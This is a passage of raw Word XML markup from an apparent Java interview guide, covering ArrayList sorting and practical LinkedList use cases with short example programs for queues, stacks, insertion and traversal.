          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to sort an ArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D2AFE2" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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can sort in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ascending</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descending</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reverseOrder()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a custom </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB247B9" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="733"/>
        </w:numPr>
        <w:jc w:val="both"/>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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom object sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, implement a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and pass it to the sort method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B38BE73" w14:textId="4399131A"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28D58EB">
          <v:rect id="_x0000_i1493" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEE9DA" w14:textId="77777777" w:rsidR="000644F2" w:rsidRPr="00CE4B95" w:rsidRDefault="000644F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc196307630"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the practical use cases of LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="571ADD73" w14:textId="04F8ACED" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">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in Java is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is implemented as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doubly-linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is especially useful in scenarios where </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are needed because of its </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the ability to easily add or remove elements without needing to resize or shift other elements (unlike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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE7266"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ere are some practical use cases where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is preferred:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6782EF" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Implementing Queues and Stacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16B011" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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Queue:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a data structure that follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>First In, First Out (FIFO)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principle. A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is ideal for implementing a queue because of its fast insertions and deletions at both ends (head and tail).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D3A38" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73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ck:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> follows the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Last In, First Out (LIFO)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principle, where the last element added is the first to be removed. You can use a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to implement a stack, leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>push()</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pop()</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peek()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods for efficient operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F391C" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Queue Implementation using LinkedList):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1E9494"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4336CE74"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Queue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289B0611" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E44906B"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QueueExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07653556"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50BBDD43"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Queue&lt;Integer&gt; queue = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522435F2"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2366040"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dding elements to the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B176134"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queue.add(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8B53A"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queue.add(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524D216D"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queue.add(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740824A4"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772A3CE"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Removing elements from the queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04031C56"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queue.poll()); // 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662C485"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queue.poll()); // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619DB6A"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90334B7"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B0A4E10" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Stack Implementation using LinkedList):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25617FC6"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286F9F1B" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D378FEB"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tackExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379924A8"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0920054B"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nkedList&lt;Integer&gt; stack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C77D3EE"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C0A2875"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ushing elements onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBEBF8E"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ack.push(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7AD7C"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ack.push(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5357547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ack.push(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58508B6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50112BD"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opping elements from the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35389D1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tack.pop()); // 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFAA03"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tack.pop()); // 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A1E71"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C4E975D"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E119B1C" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Inserting and Deleting Elements Frequently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74785038"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your application requires frequent insertion or deletion of elements from both ends (head and tail) or from the middle,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is a better choice than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This is because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has constant time complexity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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">for adding and removing elements at the beginning and end, while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takes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time for adding/removing elements at arbitrary positions due to the need for shifting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA6662" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Inserting and Removing Elements from the Middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226A920"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7032FD33" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F287FCA"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LinkedListInsertionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB68BB"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53ADD3FB"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nkedList&lt;Integer&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA1C60"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F0F60B2"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dd elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFD73FE"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10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05579D56"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20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B995A"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30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276D282"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376A3A2"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Insert at the beginning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597078F5"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First(5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD398D"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3F5BB4E"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Insert at the end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F5416"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Last(40);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE9A50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76D2A54"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Insert in the middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FDAD1C"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2, 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6E7C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456D0FB"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LinkedList: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319BE12F"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41AA42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Remove elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D189BCD"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removeFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441DD852"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removeLast();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48009B41"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A50E1CE"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LinkedList after removal: " + list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF389D4"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8FB7CBA"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2ECEF5E"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7D678"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nkedList: [5, 10, 25, 20, 30, 40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDB93F5"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nkedList after removal: [10, 25, 20, 30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7FA18" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Implementing Doubly Linked Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D22742"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you need a data structure that supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>traversing in both directions (forward and backward)</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is ideal because it’s a doubly linked list. This is useful in situations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>navigation systems</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undo/redo functionality</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bi-directional traversal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10390631" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Traversing in Both Directions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF38E6"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B26CB1D" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4ADF3E"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DoublyLinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056320D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46EFD7B5"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nkedList&lt;String&gt; list = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A332167"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A");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169566C7"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B");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C94AB98"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C");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87D51C"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C078CC7"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Traversing forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0A700"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Forward traversal:");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C039CD1"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or (String item : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3D478"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item);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AD191"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0E67694"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45FC981"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Traversing backward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C24D7B"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System.out.println("Backward traversal:");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2325A6"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or (int i = list.size() - 1; i &gt;= 0; i--) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35683376"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list.get(i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B0DC1"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69BA7C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C80C1D4"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298CCDC"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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF81505"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ward traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B5FD2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A7D0A2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FBAC6B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A126F5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ackward traversal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50466114"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37071B80"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6D22C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA99F33" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Memory-Efficient for Large Data Sets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4D50BA"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ince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does not have to pre-allocate a fixed block of memory like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it can be more memory-efficient when the size of the data structure fluctuates significantly. This is particularly helpful when dealing with large amounts of data where the total size is not known upfront.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1ECA50" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Circular Linked Lists for Applications like Round Robin Scheduling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41441144"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circular linked list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of linked list where the last node points to the first node, creating a circular structure. It’s useful in applications like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>round-robin scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for fair CPU scheduling), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>caching</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buffer management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
